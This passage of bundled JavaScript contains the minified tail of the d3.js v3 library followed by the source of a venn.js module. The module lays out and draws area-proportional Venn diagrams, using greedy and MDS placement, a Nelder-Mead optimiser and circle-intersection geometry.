c,f=ta.transition(t),h=ta.transition(o);l&&(c=Ui(l),h.attr("x",c[0]).attr("width",c[1]-c[0]),r(f)),s&&(c=Ui(s),h.attr("y",c[0]).attr("height",c[1]-c[0]),u(f)),e(f)})}function e(n){n.selectAll(".resize").attr("transform",function(n){return"translate("+f[+/e$/.test(n)]+","+h[+/^s/.test(n)]+")"})}function r(n){n.select(".extent").attr("x",f[0]),n.selectAll(".extent,.n>rect,.s>rect").attr("width",f[1]-f[0])}function u(n){n.select(".extent").attr("y",h[0]),n.selectAll(".extent,.e>rect,.w>rect").attr("height",h[1]-h[0])}function i(){function i(){32==ta.event.keyCode&&(C||(M=null,q[0]-=f[1],q[1]-=h[1],C=2),S())}function v(){32==ta.event.keyCode&&2==C&&(q[0]+=f[1],q[1]+=h[1],C=0,S())}function d(){var n=ta.mouse(b),t=!1;x&&(n[0]+=x[0],n[1]+=x[1]),C||(ta.event.altKey?(M||(M=[(f[0]+f[1])/2,(h[0]+h[1])/2]),q[0]=f[+(n[0]<M[0])],q[1]=h[+(n[1]<M[1])]):M=null),A&&m(n,l,0)&&(r(k),t=!0),N&&m(n,s,1)&&(u(k),t=!0),t&&(e(k),w({type:"brush",mode:C?"move":"resize"}))}function m(n,t,e){var r,u,i=Ui(t),c=i[0],l=i[1],s=q[e],v=e?h:f,d=v[1]-v[0];return C&&(c-=s,l-=d+s),r=(e?p:g)?Math.max(c,Math.min(l,n[e])):n[e],C?u=(r+=s)+d:(M&&(s=Math.max(c,Math.min(l,2*M[e]-r))),r>s?(u=r,r=s):u=s),v[0]!=r||v[1]!=u?(e?a=null:o=null,v[0]=r,v[1]=u,!0):void 0}function y(){d(),k.style("pointer-events","all").selectAll(".resize").style("display",n.empty()?"none":null),ta.select("body").style("cursor",null),L.on("mousemove.brush",null).on("mouseup.brush",null).on("touchmove.brush",null).on("touchend.brush",null).on("keydown.brush",null).on("keyup.brush",null),z(),w({type:"brushend"})}var M,x,b=this,_=ta.select(ta.event.target),w=c.of(b,arguments),k=ta.select(b),E=_.datum(),A=!/^(n|s)$/.test(E)&&l,N=!/^(e|w)$/.test(E)&&s,C=_.classed("extent"),z=W(b),q=ta.mouse(b),L=ta.select(t(b)).on("keydown.brush",i).on("keyup.brush",v);if(ta.event.changedTouches?L.on("touchmove.brush",d).on("touchend.brush",y):L.on("mousemove.brush",d).on("mouseup.brush",y),k.interrupt().selectAll("*").interrupt(),C)q[0]=f[0]-q[0],q[1]=h[0]-q[1];else if(E){var T=+/w$/.test(E),R=+/^n/.test(E);x=[f[1-T]-q[0],h[1-R]-q[1]],q[0]=f[T],q[1]=h[R]}else ta.event.altKey&&(M=q.slice());k.style("pointer-events","none").selectAll(".resize").style("display",null),ta.select("body").style("cursor",_.style("cursor")),w({type:"brushstart"}),d()}var o,a,c=E(n,"brushstart","brush","brushend"),l=null,s=null,f=[0,0],h=[0,0],g=!0,p=!0,v=Ol[0];return n.event=function(n){n.each(function(){var n=c.of(this,arguments),t={x:f,y:h,i:o,j:a},e=this.__chart__||t;this.__chart__=t,Tl?ta.select(this).transition().each("start.brush",function(){o=e.i,a=e.j,f=e.x,h=e.y,n({type:"brushstart"})}).tween("brush:brush",function(){var e=yu(f,t.x),r=yu(h,t.y);return o=a=null,function(u){f=t.x=e(u),h=t.y=r(u),n({type:"brush",mode:"resize"})}}).each("end.brush",function(){o=t.i,a=t.j,n({type:"brush",mode:"resize"}),n({type:"brushend"})}):(n({type:"brushstart"}),n({type:"brush",mode:"resize"}),n({type:"brushend"}))})},n.x=function(t){return arguments.length?(l=t,v=Ol[!l<<1|!s],n):l},n.y=function(t){return arguments.length?(s=t,v=Ol[!l<<1|!s],n):s},n.clamp=function(t){return arguments.length?(l&&s?(g=!!t[0],p=!!t[1]):l?g=!!t:s&&(p=!!t),n):l&&s?[g,p]:l?g:s?p:null},n.extent=function(t){var e,r,u,i,c;return arguments.length?(l&&(e=t[0],r=t[1],s&&(e=e[0],r=r[0]),o=[e,r],l.invert&&(e=l(e),r=l(r)),e>r&&(c=e,e=r,r=c),(e!=f[0]||r!=f[1])&&(f=[e,r])),s&&(u=t[0],i=t[1],l&&(u=u[1],i=i[1]),a=[u,i],s.invert&&(u=s(u),i=s(i)),u>i&&(c=u,u=i,i=c),(u!=h[0]||i!=h[1])&&(h=[u,i])),n):(l&&(o?(e=o[0],r=o[1]):(e=f[0],r=f[1],l.invert&&(e=l.invert(e),r=l.invert(r)),e>r&&(c=e,e=r,r=c))),s&&(a?(u=a[0],i=a[1]):(u=h[0],i=h[1],s.invert&&(u=s.invert(u),i=s.invert(i)),u>i&&(c=u,u=i,i=c))),l&&s?[[e,u],[r,i]]:l?[e,r]:s&&[u,i])},n.clear=function(){return n.empty()||(f=[0,0],h=[0,0],o=a=null),n},n.empty=function(){return!!l&&f[0]==f[1]||!!s&&h[0]==h[1]},ta.rebind(n,c,"on")};var Hl={n:"ns-resize",e:"ew-resize",s:"ns-resize",w:"ew-resize",nw:"nwse-resize",ne:"nesw-resize",se:"nwse-resize",sw:"nesw-resize"},Ol=[["n","e","s","w","nw","ne","se","sw"],["e","w"],["n","s"],[]],Il=ac.format=gc.timeFormat,Yl=Il.utc,Zl=Yl("%Y-%m-%dT%H:%M:%S.%LZ");Il.iso=Date.prototype.toISOString&&+new Date("2000-01-01T00:00:00.000Z")?Jo:Zl,Jo.parse=function(n){var t=new Date(n);return isNaN(t)?null:t},Jo.toString=Zl.toString,ac.second=Ft(function(n){return new cc(1e3*Math.floor(n/1e3))},function(n,t){n.setTime(n.getTime()+1e3*Math.floor(t))},function(n){return n.getSeconds()}),ac.seconds=ac.second.range,ac.seconds.utc=ac.second.utc.range,ac.minute=Ft(function(n){return new cc(6e4*Math.floor(n/6e4))},function(n,t){n.setTime(n.getTime()+6e4*Math.floor(t))},function(n){return n.getMinutes()}),ac.minutes=ac.minute.range,ac.minutes.utc=ac.minute.utc.range,ac.hour=Ft(function(n){var t=n.getTimezoneOffset()/60;return new cc(36e5*(Math.floor(n/36e5-t)+t))},function(n,t){n.setTime(n.getTime()+36e5*Math.floor(t))},function(n){return n.getHours()}),ac.hours=ac.hour.range,ac.hours.utc=ac.hour.utc.range,ac.month=Ft(function(n){return n=ac.day(n),n.setDate(1),n},function(n,t){n.setMonth(n.getMonth()+t)},function(n){return n.getMonth()}),ac.months=ac.month.range,ac.months.utc=ac.month.utc.range;var Vl=[1e3,5e3,15e3,3e4,6e4,3e5,9e5,18e5,36e5,108e5,216e5,432e5,864e5,1728e5,6048e5,2592e6,7776e6,31536e6],Xl=[[ac.second,1],[ac.second,5],[ac.second,15],[ac.second,30],[ac.minute,1],[ac.minute,5],[ac.minute,15],[ac.minute,30],[ac.hour,1],[ac.hour,3],[ac.hour,6],[ac.hour,12],[ac.day,1],[ac.day,2],[ac.week,1],[ac.month,1],[ac.month,3],[ac.year,1]],$l=Il.multi([[".%L",function(n){return n.getMilliseconds()}],[":%S",function(n){return n.getSeconds()}],["%I:%M",function(n){return n.getMinutes()}],["%I %p",function(n){return n.getHours()}],["%a %d",function(n){return n.getDay()&&1!=n.getDate()}],["%b %d",function(n){return 1!=n.getDate()}],["%B",function(n){return n.getMonth()}],["%Y",Ne]]),Bl={range:function(n,t,e){return ta.range(Math.ceil(n/e)*e,+t,e).map(Ko)},floor:y,ceil:y};Xl.year=ac.year,ac.scale=function(){return Go(ta.scale.linear(),Xl,$l)};var Wl=Xl.map(function(n){return[n[0].utc,n[1]]}),Jl=Yl.multi([[".%L",function(n){return n.getUTCMilliseconds()}],[":%S",function(n){return n.getUTCSeconds()}],["%I:%M",function(n){return n.getUTCMinutes()}],["%I %p",function(n){return n.getUTCHours()}],["%a %d",function(n){return n.getUTCDay()&&1!=n.getUTCDate()}],["%b %d",function(n){return 1!=n.getUTCDate()}],["%B",function(n){return n.getUTCMonth()}],["%Y",Ne]]);Wl.year=ac.year.utc,ac.scale.utc=function(){return Go(ta.scale.linear(),Wl,Jl)},ta.text=At(function(n){return n.responseText}),ta.json=function(n,t){return Nt(n,"application/json",Qo,t)},ta.html=function(n,t){return Nt(n,"text/html",na,t)},ta.xml=At(function(n){return n.responseXML}),"function"==typeof define&&define.amd?define(ta):"object"==typeof module&&module.exports&&(module.exports=ta),this.d3=ta}();

==> results/VENN-Diag/VENN_files/venn.js <==
 (function(venn) {
    venn.VennDiagram = function() {
        var width = 600,
            height = 350,
            padding = 15,
            duration = 1000,
            fontSize = null,
            colours = d3.scale.category10(),
            layoutFunction = venn.venn;

        function chart(selection) {
            selection.each(function(data) {
                // calculate circle position, scale to fit
                var circles = venn.scaleSolution(layoutFunction(data), width, height, padding);
                var textCentres = computeTextCentres(circles, data, width, height);

                // draw out a svg
                var svg = d3.select(this).selectAll("svg").data([circles]);
                svg.enter().append("svg");

                svg.attr("width", width)
                   .attr("height", height);

                // to properly transition intersection areas, we need the
                // previous circles locations. load from elements
                var previous = {}, hasPrevious = false;
                svg.selectAll("g").each(function (d) {
                    var path = d3.select(this).select("path").attr("d");
                    if ((d.sets.length == 1) && path) {
                        hasPrevious = true;
                        previous[d.sets[0]] = venn.circleFromPath(path);
                    }
                });

                // interpolate intersection area paths between previous and
                // current paths
                var pathTween = function(d) {
                    return function(t) {
                        var c = d.sets.map(function (set) {
                            var start = previous[set], end = circles[set];
                            if (!start) {
                                start = {x : width/2, y : height/2, radius : 1};
                            }
                            if (!end) {
                                end = {x : width/2, y : height/2, radius : 1};
                            }
                            return {'x' : start.x * (1 - t) + end.x * t,
                                    'y' : start.y * (1 - t) + end.y * t,
                                    'radius' : start.radius * (1 - t) + end.radius * t};

                        });
                        return venn.intersectionAreaPath(c);
                    };
                };

                // update data, joining on the set ids
                var nodes = svg.selectAll("g")
                    .data(data, function(d) { return d.sets; });

                // create new nodes
                var enter = nodes.enter()
                    .append('g')
                    .attr("class", function(d) {
                        return "venn-area venn-" +
                            (d.sets.length == 1 ? "circle" : "intersection") +
                            (" venn-sets-" + d.sets.join("_"));
                    });

                enter.append("path")
                    .style("fill-opacity", "0")
                    .filter(function (d) { return d.sets.length == 1; } )
                    .style("fill", function(d) { return colours(label(d)); })
                    .style("fill-opacity", ".25");

                var enterText = enter.append("text")
                    .style("fill", function(d) { return d.sets.length == 1 ? colours(label(d)) : "#444"; })
                    .text(function (d) { return label(d); } )
                    .attr("text-anchor", "middle")
                    .attr("dy", ".35em")
                    .attr("x", width/2)
                    .attr("y", height/2);

                // update existing
                var update = nodes.transition("venn").duration(hasPrevious ? duration : 0);
                update.select("path")
                    .attrTween("d", pathTween);

                var updateText = update.select("text")
                    .text(function (d) { return label(d); } )
                    .each("end", venn.wrapText(circles, label))
                    .attr("x", function(d) {
                        return Math.floor(textCentres[d.sets].x);
                    })
                    .attr("y", function(d) {
                        return Math.floor(textCentres[d.sets].y);
                    });

                // if we've been passed a fontSize explicitly, use it to
                // transition
                if (fontSize !== null) {
                    enterText.style("font-size", "0px");
                    updateText.style("font-size", fontSize);
                }

                // remove old
                var remove = nodes.exit().transition('venn').duration(duration).remove();
                remove.select("path")
                    .attrTween("d", pathTween);

                remove.select("text")
                    .text(function (d) { return label(d); } )
                    .attr("x", width/2)
                    .attr("y", height/2)
                    .style("font-size", "0px");
            });
        }

        function label(d) {
            if (d.label) {
                return d.label;
            }
            if (d.sets.length == 1) {
                return '' + d.sets[0];
            }
        }

        chart.width = function(_) {
            if (!arguments.length) return width;
            width = _;
            return chart;
        };

        chart.height = function(_) {
            if (!arguments.length) return height;
            height = _;
            return chart;
        };

        chart.padding = function(_) {
            if (!arguments.length) return padding;
            padding = _;
            return chart;
        };

        chart.colours = function(_) {
            if (!arguments.length) return colours;
            colours = _;
            return chart;
        };

        chart.fontSize = function(_) {
            if (!arguments.length) return fontSize;
            fontSize = _;
            return chart;
        };

        chart.duration = function(_) {
            if (!arguments.length) return duration;
            duration = _;
            return chart;
        };

        chart.layoutFunction = function(_) {
            if (!arguments.length) return layoutFunction;
            layoutFunction = _;
            return chart;
        };

        return chart;
    };

    /** given a list of set objects, and their corresponding overlaps.
    updates the (x, y, radius) attribute on each set such that their positions
    roughly correspond to the desired overlaps */
    venn.venn = function(areas, parameters) {
        parameters = parameters || {};
        parameters.maxIterations = parameters.maxIterations || 500;
        var lossFunction = parameters.lossFunction || venn.lossFunction;
        var initialLayout = parameters.initialLayout || venn.greedyLayout;
        var fmin = parameters.fmin || venn.fmin;

        // initial layout is done greedily
        var circles = initialLayout(areas);

        // transform x/y coordinates to a vector to optimize
        var initial = [], setids = [], setid;
        for (setid in circles) {
            if (circles.hasOwnProperty(setid)) {
                initial.push(circles[setid].x);
                initial.push(circles[setid].y);
                setids.push(setid);
            }
        }

        // optimize initial layout from our loss function
        var totalFunctionCalls = 0;
        var solution = fmin(
            function(values) {
                totalFunctionCalls += 1;
                var current = {};
                for (var i = 0; i < setids.length; ++i) {
                    var setid = setids[i];
                    current[setid] = {x: values[2 * i],
                                      y: values[2 * i + 1],
                                      radius : circles[setid].radius,
                                     // size : circles[setid].size
                                     };
                }
                return lossFunction(current, areas);
            },
            initial,
            parameters);

        // transform solution vector back to x/y points
        var positions = solution.solution;
        for (var i = 0; i < setids.length; ++i) {
            setid = setids[i];
            circles[setid].x = positions[2 * i];
            circles[setid].y = positions[2 * i + 1];
        }

        return circles;
    };

    /** Returns the distance necessary for two circles of radius r1 + r2 to
    have the overlap area 'overlap' */
    venn.distanceFromIntersectArea = function(r1, r2, overlap) {
        // handle complete overlapped circles
        if (Math.min(r1, r2) * Math.min(r1,r2) * Math.PI <= overlap + SMALL) {
            return Math.abs(r1 - r2);
        }

        return venn.bisect(function(distance) {
            return venn.circleOverlap(r1, r2, distance) - overlap;
        }, 0, r1 + r2);
    };

    /// gets a matrix of euclidean distances between all sets in venn diagram
    venn.getDistanceMatrix = function(areas, sets, setids) {
        // initialize an empty distance matrix between all the points
        var distances = [];
        for (var i = 0; i < sets.length; ++i) {
            distances.push([]);
            for (var j = 0; j < sets.length; ++j) {
                distances[i].push(0);
            }
        }

        // compute distances between all the points
        for (i = 0; i < areas.length; ++i) {
            var current = areas[i];
            if (current.sets.length !== 2) {
                continue;
            }

            var left = setids[current.sets[0]],
                right = setids[current.sets[1]],
                r1 = Math.sqrt(sets[left].size / Math.PI),
                r2 = Math.sqrt(sets[right].size / Math.PI),
                distance = venn.distanceFromIntersectArea(r1, r2, current.size);

            distances[left][right] = distances[right][left] = distance;
        }
        return distances;
    };

    /** Lays out a Venn diagram greedily, going from most overlapped sets to
    least overlapped, attempting to position each new set such that the
    overlapping areas to already positioned sets are basically right */
    venn.greedyLayout = function(areas) {
        // define a circle for each set
        var circles = {}, setOverlaps = {}, set;
        for (var i = 0; i < areas.length; ++i) {
            var area = areas[i];
            if (area.sets.length == 1) {
                set = area.sets[0];
                circles[set] = {x: 1e10, y: 1e10,
                                rowid: circles.length,
                                size: area.size,
                                radius: Math.sqrt(area.size / Math.PI)};
                setOverlaps[set] = [];
            }
        }
        areas = areas.filter(function(a) { return a.sets.length == 2; });

        // map each set to a list of all the other sets that overlap it
        for (i = 0; i < areas.length; ++i) {
            var current = areas[i];
            var weight = current.hasOwnProperty('weight') ? current.weight : 1.0;
            var left = current.sets[0], right = current.sets[1];

            // completely overlapped circles shouldn't be positioned early here
            if (current.size + SMALL >= Math.min(circles[left].size,
                                                 circles[right].size)) {
                weight = 0;
            }

            setOverlaps[left].push ({set:right, size:current.size, weight:weight});
            setOverlaps[right].push({set:left,  size:current.size, weight:weight});
        }

        // get list of most overlapped sets
        var mostOverlapped = [];
        for (set in setOverlaps) {
            if (setOverlaps.hasOwnProperty(set)) {
                var size = 0;
                for (i = 0; i < setOverlaps[set].length; ++i) {
                    size += setOverlaps[set][i].size * setOverlaps[set][i].weight;
                }

                mostOverlapped.push({set: set, size:size});
            }
        }

        // sort by size desc
        function sortOrder(a,b) {
            return b.size - a.size;
        }
        mostOverlapped.sort(sortOrder);

        // keep track of what sets have been laid out
        var positioned = {};
        function isPositioned(element) {
            return element.set in positioned;
        }

        // adds a point to the output
        function positionSet(point, index) {
            circles[index].x = point.x;
            circles[index].y = point.y;
            positioned[index] = true;
        }

        // add most overlapped set at (0,0)
        positionSet({x: 0, y: 0}, mostOverlapped[0].set);

        // get distances between all points. TODO, necessary?
        // answer: probably not
        // var distances = venn.getDistanceMatrix(circles, areas);
        for (i = 1; i < mostOverlapped.length; ++i) {
            var setIndex = mostOverlapped[i].set,
                overlap = setOverlaps[setIndex].filter(isPositioned);
            set = circles[setIndex];
            overlap.sort(sortOrder);

            if (overlap.length === 0) {
                throw "Need overlap information for set " + JSON.stringify( set );
            }

            var points = [];
            for (var j = 0; j < overlap.length; ++j) {
                // get appropriate distance from most overlapped already added set
                var p1 = circles[overlap[j].set],
                    d1 = venn.distanceFromIntersectArea(set.radius, p1.radius,
                                                        overlap[j].size);

                // sample positions at 90 degrees for maximum aesthetics
                points.push({x : p1.x + d1, y : p1.y});
                points.push({x : p1.x - d1, y : p1.y});
                points.push({y : p1.y + d1, x : p1.x});
                points.push({y : p1.y - d1, x : p1.x});

                // if we have at least 2 overlaps, then figure out where the
                // set should be positioned analytically and try those too
                for (var k = j + 1; k < overlap.length; ++k) {
                    var p2 = circles[overlap[k].set],
                        d2 = venn.distanceFromIntersectArea(set.radius, p2.radius,
                                                            overlap[k].size);

                    var extraPoints = venn.circleCircleIntersection(
                        { x: p1.x, y: p1.y, radius: d1},
                        { x: p2.x, y: p2.y, radius: d2});

                    for (var l = 0; l < extraPoints.length; ++l) {
                        points.push(extraPoints[l]);
                    }
                }
            }

            // we have some candidate positions for the set, examine loss
            // at each position to figure out where to put it at
            var bestLoss = 1e50, bestPoint = points[0];
            for (j = 0; j < points.length; ++j) {
                circles[setIndex].x = points[j].x;
                circles[setIndex].y = points[j].y;
                var loss = venn.lossFunction(circles, areas);
                if (loss < bestLoss) {
                    bestLoss = loss;
                    bestPoint = points[j];
                }
            }

            positionSet(bestPoint, setIndex);
        }

        return circles;
    };

    /// Uses multidimensional scaling to approximate a first layout here
    venn.classicMDSLayout = function(areas) {
        // bidirectionally map sets to a rowid  (so we can create a matrix)
        var sets = [], setids = {};
        for (var i = 0; i < areas.length; ++i ) {
            var area = areas[i];
            if (area.sets.length == 1) {
                setids[area.sets[0]] = sets.length;
                sets.push(area);
            }
        }

        // get the distance matrix, and use to position sets
        var distances = venn.getDistanceMatrix(areas, sets, setids);
        var positions = mds.classic(distances);

        // translate rows back to (x,y,radius) coordinates
        var circles = {};
        for (i = 0; i < sets.length; ++i) {
            var set = sets[i];
            circles[set.sets[0]] = {
                x: positions[i][0],
                y: positions[i][1],
                radius:  Math.sqrt(set.size / Math.PI)
            };
        }
        return circles;
    };

    /** Given a bunch of sets, and the desired overlaps between these sets - computes
    the distance from the actual overlaps to the desired overlaps. Note that
    this method ignores overlaps of more than 2 circles */
    venn.lossFunction = function(sets, overlaps) {
        var output = 0;

        function getCircles(indices) {
            return indices.map(function(i) { return sets[i]; });
        }

        for (var i = 0; i < overlaps.length; ++i) {
            var area = overlaps[i], overlap;
            if (area.sets.length == 1) {
                continue;
            } else if (area.sets.length == 2) {
                var left = sets[area.sets[0]],
                    right = sets[area.sets[1]];
                overlap = venn.circleOverlap(left.radius, right.radius,
                                             venn.distance(left, right));
            } else {
                overlap = venn.intersectionArea(getCircles(area.sets));
            }

            var weight = area.hasOwnProperty('weight') ? area.weight : 1.0;
            output += weight * (overlap - area.size) * (overlap - area.size);
        }

        return output;
    };

    /** Scales a solution from venn.venn or venn.greedyLayout such that it fits in
    a rectangle of width/height - with padding around the borders. also
    centers the diagram in the available space at the same time */
    venn.scaleSolution = function(solution, width, height, padding) {
        var circles = [], setids = [];
        for (var setid in solution) {
            if (solution.hasOwnProperty(setid)) {
                setids.push(setid);
                circles.push(solution[setid]);
            }
        }

        var minMax = function(d) {
            var hi = Math.max.apply(null, circles.map(
                                    function(c) { return c[d] + c.radius; } )),
                lo = Math.min.apply(null, circles.map(
                                    function(c) { return c[d] - c.radius;} ));
            return {max:hi, min:lo};
        };

        width -= 2*padding;
        height -= 2*padding;

        var xRange = minMax('x'),
            yRange = minMax('y'),
            xScaling = width  / (xRange.max - xRange.min),
            yScaling = height / (yRange.max - yRange.min),
            scaling = Math.min(yScaling, xScaling),

            // while we're at it, center the diagram too
            xOffset = (width -  (xRange.max - xRange.min) * scaling) / 2,
            yOffset = (height - (yRange.max - yRange.min) * scaling) / 2;

        var scaled = {};
        for (var i = 0; i < circles.length; ++i) {
            var circle = circles[i];
            scaled[setids[i]] = {
                radius: scaling * circle.radius,
                x: padding + xOffset + (circle.x - xRange.min) * scaling,
                y: padding + yOffset + (circle.y - yRange.min) * scaling,
            };
        }

        return scaled;
    };

    // sometimes text doesn't fit inside the circle, if thats the case lets wrap
    // the text here such that it fits
    // todo: looks like this might be merged into d3 (
    // https://github.com/mbostock/d3/issues/1642),
    // also worth checking out is
    // http://engineering.findthebest.com/wrapping-axis-labels-in-d3-js/
    // this seems to be one of those things that should be easy but isn't
    venn.wrapText = function(circles, labeller) {
        return function() {
            var text = d3.select(this),
                data = text.datum(),
                width = circles[data.sets[0]].radius || 50,
                label = labeller(data) || '';

                var words = label.split(/\s+/).reverse(),
                maxLines = 3,
                minChars = (label.length + words.length) / maxLines,
                word = words.pop(),
                line = [word],
                joined,
                lineNumber = 0,
                lineHeight = 1.1, // ems
                tspan = text.text(null).append("tspan").text(word);

            while (word = words.pop()) {
                line.push(word);
                joined = line.join(" ");
                tspan.text(joined);
                if (joined.length > minChars && tspan.node().getComputedTextLength() > width) {
                    line.pop();
                    tspan.text(line.join(" "));
                    line = [word];
                    tspan = text.append("tspan").text(word);
                    lineNumber++;
                }
            }

            var initial = 0.35 - lineNumber * lineHeight / 2,
                x = text.attr("x"),
                y = text.attr("y");

            text.selectAll("tspan")
                .attr("x", x)
                .attr("y", y)
                .attr("dy", function(d, i) {
                     return (initial + i * lineHeight) + "em";
                });
        };
    };

    /** finds the zeros of a function, given two starting points (which must
     * have opposite signs */
    venn.bisect = function(f, a, b, parameters) {
        parameters = parameters || {};
        var maxIterations = parameters.maxIterations || 100,
            tolerance = parameters.tolerance || 1e-10,
            fA = f(a),
            fB = f(b),
            delta = b - a;

        if (fA * fB > 0) {
            throw "Initial bisect points must have opposite signs";
        }

        if (fA === 0) return a;
        if (fB === 0) return b;

        for (var i = 0; i < maxIterations; ++i) {
            delta /= 2;
            var mid = a + delta,
                fMid = f(mid);

            if (fMid * fA >= 0) {
                a = mid;
            }

            if ((Math.abs(delta) < tolerance) || (fMid === 0)) {
                return mid;
            }
        }
        return a + delta;
    };

    function weightedSum(ret, w1, v1, w2, v2) {
        for (var j = 0; j < ret.length; ++j) {
            ret[j] = w1 * v1[j] + w2 * v2[j];
        }
    }


    /** minimizes a function using the downhill simplex method */
    venn.fmin = function(f, x0, parameters) {
        parameters = parameters || {};

        var maxIterations = parameters.maxIterations || x0.length * 200,
            nonZeroDelta = parameters.nonZeroDelta || 1.1,
            zeroDelta = parameters.zeroDelta || 0.001,
            minErrorDelta = parameters.minErrorDelta || 1e-6,
            rho = parameters.rho || 1,
            chi = parameters.chi || 2,
            psi = parameters.psi || -0.5,
            sigma = parameters.sigma || 0.5,
            callback = parameters.callback,
            temp;

        // initialize simplex.
        var N = x0.length,
            simplex = new Array(N + 1);
        simplex[0] = x0;
        simplex[0].fx = f(x0);
        for (var i = 0; i < N; ++i) {
            var point = x0.slice();
            point[i] = point[i] ? point[i] * nonZeroDelta : zeroDelta;
            simplex[i+1] = point;
            simplex[i+1].fx = f(point);
        }

        var sortOrder = function(a, b) { return a.fx - b.fx; };

        var centroid = x0.slice(),
            reflected = x0.slice(),
            contracted = x0.slice(),
            expanded = x0.slice();

        for (var iteration = 0; iteration < maxIterations; ++iteration) {
            simplex.sort(sortOrder);
            if (callback) {
                callback(simplex);
            }

            if (Math.abs(simplex[0].fx - simplex[N].fx) < minErrorDelta) {
                break;
            }

            // compute the centroid of all but the worst point in the simplex
            for (i = 0; i < N; ++i) {
                centroid[i] = 0;
                for (var j = 0; j < N; ++j) {
                    centroid[i] += simplex[j][i];
                }
                centroid[i] /= N;
            }

            // reflect the worst point past the centroid  and compute loss at reflected
            // point
            var worst = simplex[N];
            weightedSum(reflected, 1+rho, centroid, -rho, worst);
            reflected.fx = f(reflected);

            // if the reflected point is the best seen, then possibly expand
            if (reflected.fx <= simplex[0].fx) {
                weightedSum(expanded, 1+chi, centroid, -chi, worst);
                expanded.fx = f(expanded);
                if (expanded.fx < reflected.fx) {
                    temp = simplex[N];
                    simplex[N] = expanded;
                    expanded = temp;
                }  else {
                    temp = simplex[N];
                    simplex[N] = reflected;
                    reflected = temp;
                }
            }

            // if the reflected point is worse than the second worst, we need to
            // contract
            else if (reflected.fx >= simplex[N-1].fx) {
                var shouldReduce = false;

                if (reflected.fx <= worst.fx) {
                    // do an inside contraction
                    weightedSum(contracted, 1+psi, centroid, -psi, worst);
                    contracted.fx = f(contracted);
                    if (contracted.fx < worst.fx) {
                        temp = simplex[N];
                        simplex[N] = contracted;
                        contracted = temp;
                    } else {
                        shouldReduce = true;
                    }
                } else {
                    // do an outside contraction
                    weightedSum(contracted, 1-psi * rho, centroid, psi*rho, worst);
                    contracted.fx = f(contracted);
                    if (contracted.fx <= reflected.fx) {
                        temp = simplex[N];
                        simplex[N] = contracted;
                        contracted = temp;
                    } else {
                        shouldReduce = true;
                    }
                }

                if (shouldReduce) {
                    // do reduction. doesn't actually happen that often
                    for (i = 1; i < simplex.length; ++i) {
                        weightedSum(simplex[i], 1 - sigma, simplex[0], sigma - 1, simplex[i]);
                        simplex[i].fx = f(simplex[i]);
                    }
                }
            } else {
                temp = simplex[N];
                simplex[N] = reflected;
                reflected = temp;
            }

        }

        simplex.sort(sortOrder);
        return {f : simplex[0].fx,
                solution : simplex[0]};
    };

    venn.circlePath = function(x, y, r) {
        var ret = [];
        ret.push("\nM", x, y);
        ret.push("\nm", -r, 0);
        ret.push("\na", r, r, 0, 1, 0, r *2, 0);
        ret.push("\na", r, r, 0, 1, 0,-r *2, 0);
        return ret.join(" ");
    };

    // inverse of the circlePath function, returns a circle object from an svg path
    venn.circleFromPath = function(path) {
        var tokens = path.split(' ');
        return {'x' : parseFloat(tokens[1]),
                'y' : parseFloat(tokens[2]),
                'radius' : -parseFloat(tokens[4])
                };
    };

    /** returns a svg path of the intersection area of a bunch of circles */
    venn.intersectionAreaPath = function(circles) {
        var stats = {};
        venn.intersectionArea(circles, stats);
        var arcs = stats.arcs;

        if (arcs.length === 0) {
            return "M 0 0";

        } else if (arcs.length == 1) {
            var circle = arcs[0].circle;
            return venn.circlePath(circle.x, circle.y, circle.radius);

        } else {
            // draw path around arcs
            var ret = ["\nM", arcs[0].p2.x, arcs[0].p2.y];
            for (var i = 0; i < arcs.length; ++i) {
                var arc = arcs[i], r = arc.circle.radius, wide = arc.width > r;
                ret.push("\nA", r, r, 0, wide ? 1 : 0, 1,
                         arc.p1.x, arc.p1.y);
            }
            return ret.join(" ");
        }
    };

    function computeTextCentres(circles, areas, width, height) {
        // basically just finding the center point of each region by sampling
        // points in a grid.
        var points = {};

        var samples = 32;
        for (var i = 0; i < samples; ++i) {
            var x = i * width / samples;
            for (var j = 0; j < samples; ++j) {
                var y = j * height / samples;
                var point = {'x' : x, 'y' : y};

                var contained = [];
                for (var k in circles) {
                    if (venn.distance(point, circles[k]) <= circles[k].radius) {
                        contained.push(k);
                    }
                }
                if (!contained.length) {
                    continue;
                }

                if (!(contained in points)) {
                    points[contained] = [];
                }
                points[contained].push(point);
            }
        }

        function getCircles(area) {
            return area.map(function(a) { return circles[a]; });
        }

        var ret = {};
        for (i = 0; i < areas.length; ++i) {
            var area = areas[i].sets;
            if (points.hasOwnProperty(area)) {
                ret[area] = venn.getCenter(points[area]);
                // todo: if the point isn't in the area (could not even be a
                // circle), find the nearest point that is in the region,
                // extend past that
            } else if (area.length == 1) {
                // small/missing intersection area. default to circle centre
                var circle = circles[area[0]];
                ret[area] = {'x': circle.x, 'y': circle.y };

            } else {
                var areaStats = {};
                venn.intersectionArea(getCircles(area), areaStats);

                if (areaStats.arcs.length === 0) {
                    if (areas[i].size > 0) {
                        console.log("WARNING: area " + JSON.stringify(area) + " isn't represented on diagram" );
                    }
                    ret[area] = {'x' : 0, 'y' : -1000};
                } else {
                    // take average of all the points in the outer perimiter
                    ret[area] = venn.getCenter(areaStats.arcs.map(function (a) { return a.p1; }));
                }
            }
        }
        return ret;
    }

    // sorts all areas in the venn diagram, so that
    // a particular area is on top (relativeTo) - and
    // all other areas are so that the smallest areas are on top
    venn.sortAreas = function(div, relativeTo) {
        // need to sort div's so that Z order is correct
        div.selectAll("g").sort(function (a, b) {
            // highest order set intersections first
            if (a.sets.length != b.sets.length) {
                return a.sets.length - b.sets.length;
            }

            // current element is highest inside its order
            if ((a == relativeTo) || (b == relativeTo)) {
                return (a == relativeTo) ? 1 : -1;
            }

            // finally by size
            return b.size - a.size;
        });
    }


    var SMALL = 1e-10;

    /** Returns the intersection area of a bunch of circles (where each circle
     is an object having an x,y and radius property) */
    venn.intersectionArea = function(circles, stats) {
        // get all the intersection points of the circles
        var intersectionPoints = getIntersectionPoints(circles);

        // filter out points that aren't included in all the circles
        var innerPoints = intersectionPoints.filter(function (p) {
            return venn.containedInCircles(p, circles);
        });

        var arcArea = 0, polygonArea = 0, arcs = [], i;

        // if we have intersection points that are within all the circles,
        // then figure out the area contained by them
        if (innerPoints.length > 1) {
            // sort the points by angle from the center of the polygon, which lets
            // us just iterate over points to get the edges
            var center = venn.getCenter(innerPoints);
            for (i = 0; i < innerPoints.length; ++i ) {
                var p = innerPoints[i];
